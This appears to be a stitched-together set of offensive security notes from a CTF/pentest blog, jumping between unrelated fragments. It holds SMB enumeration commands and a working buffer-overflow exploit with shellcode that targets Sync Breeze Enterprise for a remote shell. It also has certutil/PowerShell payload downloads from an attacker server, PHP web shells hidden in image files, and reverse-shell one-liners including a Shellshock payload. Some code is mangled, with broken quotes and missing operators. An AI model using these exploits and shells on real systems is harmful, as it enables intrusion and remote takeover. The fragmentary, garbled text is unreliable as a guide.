Port 5985 - WinRM

SMB :

   smbclient -U "" -L //<ip>         ->  -L flag Get a list of shares available on a host
   smbcleint -U "" //<ip>            ->  Connects to our users shares
 
   smb: \> recurse on               ->  Recursively list the contents
   smb: \> ls
   
   mget                             ->  Downloads file
   
   smbget -R smb://<ip>/path/ -U "" -> -R flag recursive download smbfiles owned by -U

rpcclient:

  rpcclient -U "" -N 10.10.10.161
  commands:
           enumdomusers
           enumdomgroups
           queryuser 0x
           querygroup 0x
           querygroupmem 0x

This pwn challenge was part of Sector443 CTF.
The challenge files ->here
Read about basics here before reading this post. READ
This challenge was simple and fun as it involved overflowing beer ;)

How to restrict someone debugging your program just add this:

if (ptrace(PTRACE_TRACEME, 0, 1, 0) < 0)
    {
      printf("[-] Don't use a debugguer !\n");
      abort();
      }

Simple Buffer-Over-Flow on an webserver

This is post is about making a buffer overflow exploit to get a remote shell. We will exploit Sync Breeze Enterprize 10.0.28 on a windows box. PS: This post is not updated. If I get time I will write the code’s explaination. Thank you<3 ```python import socket badchars=(“\xba\xa7\x57\x4f\xe1\xda\xda\xd9\x74\x24\xf4\x5e\x31\xc9\xb1” “\x52\x31\x56\x12\x83\xc6\x04\x03\xf1\x59\xad\x14\x01\x8d\xb3” “\xd7\xf9\x4e\xd4\x5e\x1c\x7f\xd4\x05\x55\xd0\xe4\x4e\x3b\xdd” “\x8f\x03\xaf\x56\xfd\x8b\xc0\xdf\x48\xea\xef\xe0\xe1\xce\x6e” “\x63\xf8\x02\x50\x5a\x33\x57\x91\x9b\x2e\x9a\xc3\x74\x24\x09” “\xf3\xf1\x70\x92\x78\x49\x94\x92\x9d\x1a\x97\xb3\x30\x10\xce” “\x13\xb3\xf5\x7a\x1a\xab\x1a\x46\xd4\x40\xe8\x3c\xe7\x80\x20” “\xbc\x44\xed\x8c\x4f\x94\x2a\x2a\xb0\xe3\x42\x48\x4d\xf4\x91” “\x32\x89\x71\x01\x94\x5a\x21\xed\x24\x8e\xb4\x66\x2a\x7b\xb2” “\x20\x2f\x7a\x17\x5b\x4b\xf7\x96\x8b\xdd\x43\xbd\x0f\x85\x10” “\xdc\x16\x63\xf6\xe1\x48\xcc\xa7\x47\x03\xe1\xbc\xf5\x4e\x6e” “\x70\x34\x70\x6e\x1e\x4f\x03\x5c\x81\xfb\x8b\xec\x4a\x22\x4c” “\x12\x61\x92\xc2\xed\x8a\xe3\xcb\x29\xde\xb3\x63\x9b\x5f\x58” “\x73\x24\x8a\xcf\x23\x8a\x65\xb0\x93\x6a\xd6\x58\xf9\x64\x09” “\x78\x02\xaf\x22\x13\xf9\x38\x8d\x4c\x1c\x84\x65\x8f\x1e\xe7” “\x2e\x06\xf8\x6d\xc1\x4e\x53\x1a\x78\xcb\x2f\xbb\x85\xc1\x4a” “\xfb\x0e\xe6\xab\xb2\xe6\x83\xbf\x23\x07\xde\x9d\xe2\x18\xf4” “\x89\x69\x8a\x93\x49\xe7\xb7\x0b\x1e\xa0\x06\x42\xca\x5c\x30” “\xfc\xe8\x9c\xa4\xc7\xa8\x7a\x15\xc9\x31\x0e\x21\xed\x21\xd6” “\xaa\xa9\x15\x86\xfc\x67\xc3\x60\x57\xc6\xbd\x3a\x04\x80\x29” “\xba\x66\x13\x2f\xc3\xa2\xe5\xcf\x72\x1b\xb0\xf0\xbb\xcb\x34” “\x89\xa1\x6b\xba\x40\x62\x9b\xf1\xc8\xc3\x34\x5c\x99\x51\x59” “\x5f\x74\x95\x64\xdc\x7c\x66\x93\xfc\xf5\x63\xdf\xba\xe6\x19” “\x70\x2f\x08\x8d\x71\x7a”) nops=”\x90”10 eip=”\x71\xE8\xF1\x77” eip2=”\x83\x0c\x09\x10” buf=”A”780 +eip+”CCCC” +nops+badchars #eip 42306142 #offset 780 #10090c83 s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((“192.168.29.130”,80)) payload=”username=”+buf+”&password=A” req=”POST /login HTTP/1.1\r\n” req+=”Host: 192.168.29.129\r\n” req+=”User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\r\n” req+=”Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8\r\n” req+=”Accept-Language: en-US,en;q=0.5\r\n” req+=”Referer: http://192.168.29.129/login\r\n” req+=”Connection: close\r\n” req+=”Content-Type: application/x-www-form-urlencoded\r\n” req+=”Content-Length: “+str(len(payload))+”\r\n” req+=”\r\n” req+=payload s.send(req) print str(len(buf)) print req s.close()

This post’s content is about when you get a low, unprivileged shell on a Windows Machine. First and foremost thing is to upload files on the system.

Steps:

Start server on attacker machine:
>python3 -m http.server 80 #on attacker machine
On victim machine:
1)Using certutil.exe
>certutil.exe -urlcache -split -f http://<ip><port>/path/to/file
2)Using powershell
>powershell -c (New-Object Net.WebClient).DownloadFile('http://ip-addr:port/file', 'output-file')

Using exiftool

  exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' normal.jpg
  mv normal.jpg normal.php.jpg

Vim edit png

  <?php echo "START<br/><br/>\n\n\n"; system($_GET["cmd"]); echo "\n\n\n<br/><br/>END"; ?>

reverse shells

  python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.30",4444));os.dup2(s.fileno(),0);              os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
  rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.4 4444 >/tmp/f
  nc -e /bin/sh 10.0.0.1 1234

Shellshock Reverse Shell -> User-Agent: () { :; }; echo; /bin/bash -i >& /dev/tcp/ip/port 0>&1